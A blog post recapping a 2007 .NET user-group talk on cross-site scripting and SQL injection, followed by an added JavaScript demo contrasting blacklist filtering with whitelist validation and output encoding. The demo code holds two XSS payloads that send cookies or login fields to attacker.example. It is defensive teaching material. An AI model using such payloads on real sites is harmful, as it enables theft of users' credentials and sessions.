Recently, the TRINUG (Triangle .Net Users Group) held a codecamp at ECPI on June 23, 2007 in Raleigh, NC. It was quite an event!! There were 23 speakers with 25 presentations on various .Net related subjects including AJAX, Silverlight, Web Parts, WPF, LINQ and more. The day started off with a bang with keynote speaker Rod Paddock from CODE magazine and finished with a 32 inch LCD HDTV give-away sponsored by FarPoint Technologies and a Pocket PC and software from Microsoft. I would like to personally thank ALL the sponsors, speakers and the 130 attendees for making this the best TRINUG codecamp ever.
My presentation covered web site security with a focus on browser injection vulnerabilities. A fictitious Sanford and Son Bank web site and an attacker-controlled “Hacked” web site were used as tools to demonstrate the impact of not protecting a web site against browser injection attacks such as cross-site scripting (XSS) and SQL injection.
The demo started with a crafted hyperlink that takes the user to the expected “Sanford and Son” bank login page; the malicious script rides along in the link itself (a reflected XSS attack). The user logs in to the bank web site and sees the “members” home page as expected. Behind the scenes, without the user’s knowledge, his or her user name and password were stolen and inserted into the “Hacked” web site’s database.
Next, script was injected into the database behind the bank’s “blog” page (a stored XSS attack), so that the email address of anyone who posted a comment on that blog entry was sent to the “Hacked” web site.
Next, we turned on the ASP.NET request validation feature (ValidateRequest="true", which is the default in ASP.NET 1.1 and later) to block the login XSS attack. I demonstrated that this feature alone is not enough and showed a new attack that still stole the user name and password.
The remainder of the presentation focused on the “white list” approach to validating and sanitizing “evil input”, and on output encoding, to prevent these types of attacks: regular-expression validation for the input side and the Microsoft Anti-Cross Site Scripting Library V1.5 for encoding the response. The presentation includes hyperlinks for further research into these types of attacks and other security-related issues.
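The following is an added example, not code from the presentation or from Microsoft, that puts the two halves of that argument side by side: a blacklist request filter lets an attribute-breakout payload through because it contains no `<`, while whitelist validation rejects it and attribute encoding renders it harmless. The login form, the payloads, the `attacker.example` host and the field names are all constructed for the demo, and `blacklistRequestValidation` is a deliberately simplified stand-in for ASP.NET's ValidateRequest, not its real implementation.

```javascript
// Added example (not from the presentation or from Microsoft). Models a login
// page that echoes the "user" query parameter into the user-name text box and
// compares blacklist filtering with whitelist validation plus output encoding.

// ASSUMPTION: simplified stand-in for a ValidateRequest-style blacklist. The
// real ASP.NET check is more involved; this one only rejects "<" followed by a
// letter, "!", "/" or "?", and the "&#" prefix of numeric character references.
function blacklistRequestValidation(value) {
  return !/<[A-Za-z!\/?]|&#/.test(value);
}

// Whitelist validation: a user name is 3-20 characters drawn from letters,
// digits, dot, underscore or hyphen. Anything else is rejected outright, so
// there is no list of "dangerous" characters to keep up to date.
const USERNAME_RE = /^[A-Za-z0-9._-]{3,20}$/;
function isValidUsername(value) {
  return USERNAME_RE.test(value);
}

// Minimal HTML attribute encoder (stand-in for a library call such as the
// Anti-XSS library's HtmlAttributeEncode). The five characters that can change
// the meaning of a quoted attribute value become character references.
function htmlAttributeEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable login form: the echoed user name lands inside value="..." unencoded.
function renderLoginVulnerable(username) {
  return '<form method="post"><input type="text" name="user" value="' + username +
         '"><input type="password" name="pass"></form>';
}

// Hardened login form: identical markup, but the user name is attribute-encoded.
function renderLoginHardened(username) {
  return '<form method="post"><input type="text" name="user" value="' +
         htmlAttributeEncode(username) + '"><input type="password" name="pass"></form>';
}

// Counts real event-handler attributes (on...="...") in rendered markup. In the
// hardened output the quotes are encoded, so "onfocus=&quot;" is just text.
function countEventHandlerAttributes(html) {
  return (html.match(/\son\w+="/g) || []).length;
}

// Constructed payloads. The first is the classic tag injection that a
// blacklist catches; the second breaks out of value="" with no "<" at all and
// hooks the form's submit handler to leak both fields to attacker.example.
const TAG_PAYLOAD =
  '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';
const ATTR_PAYLOAD =
  '" onfocus="this.form.onsubmit=function(){new Image().src=' +
  "'http://attacker.example/?u='+this.user.value+'&p='+this.pass.value}\" x=\"";

// Runs the comparison and returns the observations as a plain object.
function runDemo() {
  return {
    tagPayloadBlockedByBlacklist: !blacklistRequestValidation(TAG_PAYLOAD),
    attrPayloadPassesBlacklist: blacklistRequestValidation(ATTR_PAYLOAD),
    attrPayloadPassesWhitelist: isValidUsername(ATTR_PAYLOAD),
    vulnerableHandlers: countEventHandlerAttributes(renderLoginVulnerable(ATTR_PAYLOAD)),
    hardenedHandlers: countEventHandlerAttributes(renderLoginHardened(ATTR_PAYLOAD)),
  };
}

console.log(runDemo());
```

The two defenses are complementary: the whitelist stops the payload at the door for fields whose shape is known (a user name, an account number), and the encoder protects fields that legitimately contain quotes or angle brackets (a blog comment) by encoding for the exact context they are written into. In the ASP.NET pages of the talk the corresponding pieces are a RegularExpressionValidator on the input and the Anti-XSS library's encoding methods on the output.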